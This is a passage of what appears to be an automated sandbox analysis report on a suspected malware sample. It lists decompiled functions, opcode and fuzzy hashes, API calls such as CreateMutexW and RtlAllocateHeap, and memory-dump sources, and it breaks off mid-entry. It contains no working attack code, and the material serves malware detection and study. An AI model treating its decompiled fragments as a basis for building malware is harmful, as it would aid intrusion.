Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID: $>_kq
API String ID: 0-1412446344
Opcode ID: 5ab315a501456d4d94c8ab1c168d8453a1e12ec900f6157623175653bd8109db
Instruction ID: 08533735fa91c7ceeabb26b3744c000ebcb4248e86fdb0ab7cac57b420e91b42
Opcode Fuzzy Hash: 5ab315a501456d4d94c8ab1c168d8453a1e12ec900f6157623175653bd8109db
Instruction Fuzzy Hash: 8341A270E082658BCB24CB69C8945BEBB63BBC5214F298967CC55DB605C731E853CB86

Uniqueness

Uniqueness Score: -1.00%

Function 04C70508 Relevance: 1.6, APIs: 1, Instructions: 93
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04C704B1

Memory Dump Source

Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 082e444584497a487279da2e465c39fd0c53745882e6ce9f45ae6aea43e61a2a
Instruction ID: 2bf278db3b558627f4e66dd5bf5e2b4345c64e057d34a3578151e1f3bbf03f4e
Opcode Fuzzy Hash: 082e444584497a487279da2e465c39fd0c53745882e6ce9f45ae6aea43e61a2a
Instruction Fuzzy Hash: 2F31A2764057809FE751CF15D889B66BFE4FF06324F0880AADD888F263D375A949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C70416 Relevance: 1.6, APIs: 1, Instructions: 84
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04C704B1

Memory Dump Source

Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 150ecd7b7460acd692abc1b9165e29fd69509f6578e268de654b9e69756d5775
Instruction ID: a0af58ba817ea50a50985725e3568071af449e251ed990ccb388b4ddf129af44
Opcode Fuzzy Hash: 150ecd7b7460acd692abc1b9165e29fd69509f6578e268de654b9e69756d5775
Instruction Fuzzy Hash: E03164715057806FE721CF65CC85F56FFE8EF05310F08849AE9859B292D365E904C765

Uniqueness

Uniqueness Score: -1.00%

Function 04C7043E Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04C704B1

Memory Dump Source

Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 740b438ef2723bbd9e4d5dfcd11483eadbba7669ef05989f3358c092a2e7c263
Instruction ID: 6ae292510591958a5f547a284381390a62aafabdeb4f78d655e8b98e0074f3f1
Opcode Fuzzy Hash: 740b438ef2723bbd9e4d5dfcd11483eadbba7669ef05989f3358c092a2e7c263
Instruction Fuzzy Hash: EC217FB1640740AFE721CF2ACC85B66FBE8EF04320F08846AE9459B242E675F504CB75

Uniqueness

Uniqueness Score: -1.00%

Function 04C70205 Relevance: 1.6, APIs: 1, Instructions: 58
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DispatchMessageW.USER32(?), ref: 04C70270

Memory Dump Source

Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: dd592d43d1feec52f94800ab874218df02d4e751a1e032b2c358fd409030305f
Instruction ID: e1c7882a70d53275fa9301b488f0fac62b4faaf2f119306863de7a1ee97b9d71
Opcode Fuzzy Hash: dd592d43d1feec52f94800ab874218df02d4e751a1e032b2c358fd409030305f
Instruction Fuzzy Hash: EF117C7540D7C0AFD7128F259C44B62BFB4EF47624F0980DAED848F263D265A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C702B4 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 04C7030C

Memory Dump Source

Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 29001acf005d97dd65987f66bea5171321f8ba138f40bcda328c6ce0baba1b0a
Instruction ID: 5521e110d78e72906b509b3e0efc98c2a3a116e785f8dd60fcb175fbd5271c65
Opcode Fuzzy Hash: 29001acf005d97dd65987f66bea5171321f8ba138f40bcda328c6ce0baba1b0a
Instruction Fuzzy Hash: 071173725093809FD751CF66DC85B56BFE8EF46220F0884AAED49CF252D274E948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04C702D2 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 04C7030C

Memory Dump Source

Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: cba8787a6df6210c8464f0cb995a0beee91737829fd51b4e8583b0c6e520bd55
Instruction ID: 41395341e8a0e2659264a18f8fad8b12a8b3511d081ebfbf332d1501dee76dea
Opcode Fuzzy Hash: cba8787a6df6210c8464f0cb995a0beee91737829fd51b4e8583b0c6e520bd55
Instruction Fuzzy Hash: 14017172A053408FDB60CF6BD885766FB94EF00720F08C4AAED49CF646E674E508CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C7023E Relevance: 1.5, APIs: 1, Instructions: 35
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DispatchMessageW.USER32(?), ref: 04C70270

Memory Dump Source

Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: d82a08c71457e1b3d3442eb6ce44c40a23858c62e89ca85e1a9a158bf998652d
Instruction ID: e005d2a1b0371d5f52885469d9284c7c8c976a8032a8e97626570487f36490b7
Opcode Fuzzy Hash: d82a08c71457e1b3d3442eb6ce44c40a23858c62e89ca85e1a9a158bf998652d
Instruction Fuzzy Hash: B6F0AF369087409FDB608F07D884765FFA0EF04320F08C0AADE494B656E279F508CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00403E3D Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00403e3d
0x00403e43
0x00403e49
0x00403e7b
0x00403e80
0x00403e86
0x00000000
0x00403e86
0x00403e4d
0x00403e4f
0x00403e4f
0x00403e66
0x00403e6f
0x00403e77
0x00000000
0x00000000
0x00403e57
0x00403e59
0x00000000
0x00000000
0x00403e5c
0x00403e61
0x00403e62
0x00403e64
0x00000000
0x00000000
0x00403e64
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED

Uniqueness

Uniqueness Score: -1.00%

Function 025520D0 Relevance: 1.4, Strings: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r*+, xrefs: 0255230F

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: e441ae31fce197191459f86fb955afd528597058b49e9cbdaafcfca2ce724b74
Instruction ID: 9a9ba770c7c36654d5b8420177f2205e19d3f8740ac1bae939549c35538e61bb
Opcode Fuzzy Hash: e441ae31fce197191459f86fb955afd528597058b49e9cbdaafcfca2ce724b74
Instruction Fuzzy Hash: EF713D34E09219DFCB44DFA8C4A56BEBBB2FF44300F1084AADD06DB255DB709941CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 025502E8 Relevance: 1.4, Strings: 1, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@fq, xrefs: 02550537

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID: :@fq
API String ID: 0-3673016210
Opcode ID: b4fdd09f1dbc4f3b0018ebb53425a58758e37a6887519c0e655f3638d3d3ee32
Instruction ID: 9952e570698b5ed75f71f700e1dc64b788246ad990f2dbcf6cbb8b89c78d710b
Opcode Fuzzy Hash: b4fdd09f1dbc4f3b0018ebb53425a58758e37a6887519c0e655f3638d3d3ee32
Instruction Fuzzy Hash: 46517D70A05215CFCB14DF68C0A46AEBBF2FF8D300F25886AD9069B395DB31AC46CB55

Uniqueness

Uniqueness Score: -1.00%

Function 025512A0 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df1f239054af878372595883da50d78680894b3459619e580c6d37aaaeca9864
Instruction ID: 4f2fca6b0e054d6e410cfd7950fa28c78ca6246561bbfa1ad88e54561b32590d
Opcode Fuzzy Hash: df1f239054af878372595883da50d78680894b3459619e580c6d37aaaeca9864
Instruction Fuzzy Hash: CA220134A00A15CFCB64DF68C494A6ABBF2FF48304F14C99AD85A9B71ADB34AD45CF44

Uniqueness

Uniqueness Score: -1.00%

Function 025509A0 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0191efe0898f7bc92d89f8656da1319b7ed1ba070b63501aa6741c9ad6e4a538
Instruction ID: 27c9b905de9c287b97c456b14ff87c661dc38c84f10154e904651abea05b75ed
Opcode Fuzzy Hash: 0191efe0898f7bc92d89f8656da1319b7ed1ba070b63501aa6741c9ad6e4a538
Instruction Fuzzy Hash: 1F51E931B00625DFCB159BB8D8A46AEB7F7BF48314F204556E946DB294EB30DD05CB84

Uniqueness

Uniqueness Score: -1.00%

Function 02550BC0 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0f714be1f01ad168710b91f0c4256800ae27410027d94c541c390887fb7177
Instruction ID: 0acaffb263d745fad723aff5bd8b66a851a6686a16363f445e86eadc8fd3d98b
Opcode Fuzzy Hash: ca0f714be1f01ad168710b91f0c4256800ae27410027d94c541c390887fb7177
Instruction Fuzzy Hash: 4641A531B041188FC7159B68C4646AEB7E7BF8A310F15846AEC069F3A1DE729D0AC795

Uniqueness

Uniqueness Score: -1.00%

Function 02550682 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a5034dedb30274afb0dd129eeb98a4f3c3d25582e92143fa852cd436c961dd3
Instruction ID: c9b119559da32c2380ffc61357fd5d83828ec4330c8775477da24472b3cc9e42
Opcode Fuzzy Hash: 9a5034dedb30274afb0dd129eeb98a4f3c3d25582e92143fa852cd436c961dd3
Instruction Fuzzy Hash: 2641DF71A902158FCB047BB4F82C66D7BA3BF847157048D6AF802CB2A9DF708C51DB95

Uniqueness

Uniqueness Score: -1.00%

Function 02551458 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f391878be01dfcea7f46c3567436fa3c1089565c89ffa6856c76434415543e
Instruction ID: d046ca85d2cf9a04b8bdc675efb93256a31a4f43580444cae9e2f3199e6a1abd
Opcode Fuzzy Hash: c4f391878be01dfcea7f46c3567436fa3c1089565c89ffa6856c76434415543e
Instruction Fuzzy Hash: 5251F934A01619CFDB54EF64C898B9DBBB2BF48304F1081DAD80AAB365DB359D84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 025502DA Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9645f179b3ef20b27d0120613276596979ea8da4f7b7078d3cdec7c858b7926
Instruction ID: f1dc7c62f0a8f7e2e0995b7bf4cbc09ccf76c5d284b0d2f84416959d3ff33d36
Opcode Fuzzy Hash: f9645f179b3ef20b27d0120613276596979ea8da4f7b7078d3cdec7c858b7926
Instruction Fuzzy Hash: F1418D70A15215DFDB14CF68C0A4BAEBBB6FF8C310F15486AD902AB394DB31AC45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 02551290 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7924d36be12cd55d43ba026cd9c346287756d0fee356a30089661ee19f7f7bb8
Instruction ID: 39067a1abed76c927592fa26e3a6d763cdde2dcbaa55dd740fe12edf11daa19c
Opcode Fuzzy Hash: 7924d36be12cd55d43ba026cd9c346287756d0fee356a30089661ee19f7f7bb8
Instruction Fuzzy Hash: DA410534A04629CFCB50EB65D8A4B9DBBB2BF49344F1084EAD80EAB355DB309D84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 02550006 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ec8b7b61112c62e192c816540d74f8c0b2b39ee60599d540c4447cf2668eba0
Instruction ID: 692965943033b340b80dc6d277065d8bddf1862821e8d1602d320e7161e9598b
Opcode Fuzzy Hash: 2ec8b7b61112c62e192c816540d74f8c0b2b39ee60599d540c4447cf2668eba0
Instruction Fuzzy Hash: B531B03050E3C19FCB03AB7498795A93FB5EE46304B0949CBD881CB1A7DA359809C72B

Uniqueness

Uniqueness Score: -1.00%

Function 02552C58 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1b16c1a83af17540c76f1fc5cad6431956c1c10c9a98970056c8ed956ded142
Instruction ID: 22b846d3fe0e952a8734f22926f49d6962360d5ee445012016bf91aba3a70af0
Opcode Fuzzy Hash: e1b16c1a83af17540c76f1fc5cad6431956c1c10c9a98970056c8ed956ded142
Instruction Fuzzy Hash: A4213730608261EFC7158B68DCA8A29BFE5BF46210F1989A7DC56CB653C771AC40C75A

Uniqueness

Uniqueness Score: -1.00%

Function 025525DE Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba3d9be584447d565476d57126df57fd499e8717e4111f6b717c36eaa72a7ead
Instruction ID: 04873d118f51d8c1484766e670bb7206a4a2aa48694dbde3ab5969d9b099c330
Opcode Fuzzy Hash: ba3d9be584447d565476d57126df57fd499e8717e4111f6b717c36eaa72a7ead
Instruction Fuzzy Hash: 0531AC70E00249CBDB60DFA5E45878ABBF2BF84314F24C66AC8059B255DBB49989CF85

Uniqueness

Uniqueness Score: -1.00%

Function 025521E9 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1e8c51b1b055bfd0cb027700a251b2d19c7c200325e28cc08bc66ad4460c82d
Instruction ID: 633cdd3e43a5044d6ad5046d1fdb07d79bb9600f77ef288bac77ea674d3920ba
Opcode Fuzzy Hash: b1e8c51b1b055bfd0cb027700a251b2d19c7c200325e28cc08bc66ad4460c82d
Instruction Fuzzy Hash: 19313634E08219DFCB84DBA8C0656BDBBB1BF44304F1049AADC02EB665D731DA45CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 02554180 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8660dde167af3db32193b4fbc5810b483b680624c503a190a6371655c8da920a
Instruction ID: 00e4577c693f8976441b15115a0d4f90646edfe7f45a7f8411d3c6709250a91c
Opcode Fuzzy Hash: 8660dde167af3db32193b4fbc5810b483b680624c503a190a6371655c8da920a
Instruction Fuzzy Hash: 3E210531A082768BCB14AFF1A4681FF7BB7BF95240B15496FDC02DB145DE318885CB96

Uniqueness

Uniqueness Score: -1.00%

Function 02554190 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 374877ab5860e6bfb422461a3d4a3dd949c25cab1ca6e82d94c5ba3bdddc2ef3
Instruction ID: 31fbdbbafb15e6f01adea66fd393eb033a1c1cd269b3d0011023ab147c42df31
Opcode Fuzzy Hash: 374877ab5860e6bfb422461a3d4a3dd949c25cab1ca6e82d94c5ba3bdddc2ef3
Instruction Fuzzy Hash: 7A11DA31A042368BDB14AFF5D4282BF76B7BF85340F51492F99079B644DE71C840C796

Uniqueness

Uniqueness Score: -1.00%

Function 02388244 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725019398.0000000002380000.00000040.00000040.sdmp, Offset: 02380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2380000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0746fe9a5e936d183c0a348e1a9081c7b76fee4c8b5391a15dbe5681313e0d52
Instruction ID: e3fdff3f1e0f15da4ae8a8cd0765ffcf13d4b77f92ce397a59686ffe8bd55fd6
Opcode Fuzzy Hash: 0746fe9a5e936d183c0a348e1a9081c7b76fee4c8b5391a15dbe5681313e0d52
Instruction Fuzzy Hash: B811B130254788DFD715DB54C940B26BB96EF89718F28CAACE9490FA43C77BD803CA52

Uniqueness

Uniqueness Score: -1.00%

Function 025511DF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1255e8143d82572c333878f8d68d1546432fd1bb58266ac1de6b7f062f99c1d
Instruction ID: 44afb0c8fc5cdb0e77db9c0ea39397be9263c7cc746db3fb32e2c646e0b96777
Opcode Fuzzy Hash: d1255e8143d82572c333878f8d68d1546432fd1bb58266ac1de6b7f062f99c1d
Instruction Fuzzy Hash: 941182303086A08FC7169739D068AA97FF6BFC620071981EBD446CF276CE658C09CB56

Uniqueness

Uniqueness Score: -1.00%

Function 025505B9 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e208018f646288c9cbafce815bf246acb0f005ffb65fc04e8738d660f913d2c
Instruction ID: d28d5b85d27345897d7a5b11cc5b404fb5eec67c17437890beca9254b89a4c76
Opcode Fuzzy Hash: 8e208018f646288c9cbafce815bf246acb0f005ffb65fc04e8738d660f913d2c
Instruction Fuzzy Hash: AF0126213041610FC749327D84222BF779B9FCAA54318446FF042EF385CD68AC0793DA

Uniqueness

Uniqueness Score: -1.00%

Function 023805BF Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725019398.0000000002380000.00000040.00000040.sdmp, Offset: 02380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2380000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b836ea31deb8091f6029d15c0a09fd41ff9c19c5325f0265543586bfe514d36
Instruction ID: 947079d3ddce1c640ee1ed7d3eb86f95ed86dd9b0a4a3dc04f91ffa05d1f2f57
Opcode Fuzzy Hash: 6b836ea31deb8091f6029d15c0a09fd41ff9c19c5325f0265543586bfe514d36
Instruction Fuzzy Hash: B801D8731097809FD725CF15AC51856FFE4EB41730B1884EFE84DCB212D525E509CB65

Uniqueness

Uniqueness Score: -1.00%

Function 023805AD Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725019398.0000000002380000.00000040.00000040.sdmp, Offset: 02380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2380000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7baa3fee72041d93880d98c232ab9886bb905370097aa98ea47db10454afc959
Instruction ID: 67559a2efa4a1d4a1bba9a5c4b67cf4bbb730a6269125a81c0d1d13a1dac3627
Opcode Fuzzy Hash: 7baa3fee72041d93880d98c232ab9886bb905370097aa98ea47db10454afc959
Instruction Fuzzy Hash: 9F0188765497C16FD7118B16AC41853FFE8DB4663070884ABE889CB612D125B909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 025505C8 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb5bd2328a924e5ed2997f1f5dc0cd5bcd450b88ff7fc00adccf9cc3ab7193f
Instruction ID: dd107337e1f86578974567e6c69e516644188cdfab10ac71ded3d8f832023871
Opcode Fuzzy Hash: 7eb5bd2328a924e5ed2997f1f5dc0cd5bcd450b88ff7fc00adccf9cc3ab7193f
Instruction Fuzzy Hash: AFF0B4713101250BC649767D942267F62CBABC9A58754442FF106EB388CD78AC0763DA

Uniqueness

Uniqueness Score: -1.00%

Function 02551218 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63c557081a99a98b9ee661c4f3d711914055093d8c2cbf9b035dd9eb2230aa82
Instruction ID: 1aad6e99cc784c4af617121ed2659acee7e61a54e30e7d9bfcb8a356735aaa0d
Opcode Fuzzy Hash: 63c557081a99a98b9ee661c4f3d711914055093d8c2cbf9b035dd9eb2230aa82
Instruction Fuzzy Hash: BC0112303045208BC754A729D068A6D7BE6BFC570472585ABE80ACB765CF75DC49CB86

Uniqueness

Uniqueness Score: -1.00%

Function 02550908 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 215e12476e48ded66bb2ec07ac5b580f65fe818d7987fc5be368e2265acf3a8c
Instruction ID: 9332ca956396563b30cf291b3d9288e9afce11e55932bd2fbd2b21be12f4264d
Opcode Fuzzy Hash: 215e12476e48ded66bb2ec07ac5b580f65fe818d7987fc5be368e2265acf3a8c
Instruction Fuzzy Hash: 89F0E9309143648FD7405BF5C86465BBFF5BF4B700B0608979C42A7285D674AC11C295

Uniqueness

Uniqueness Score: -1.00%

Function 02550918 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a8d428b995da80da501f6e51afb2f1846445733c47a777a780d3b527f36c9e
Instruction ID: ee6ef0227eb3e2c581a50e8e781c5fa856799f52573e9d345fc94b46dded0113
Opcode Fuzzy Hash: a2a8d428b995da80da501f6e51afb2f1846445733c47a777a780d3b527f36c9e
Instruction Fuzzy Hash: 92E05532E142388BDB1019F598241AFBBB9B789750F000C239D0793288D9B08805C2C5

Uniqueness

Uniqueness Score: -1.00%

Function 02388300 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.725019398.0000000002380000.00000040.00000040.sdmp, Offset: 02380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2380000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
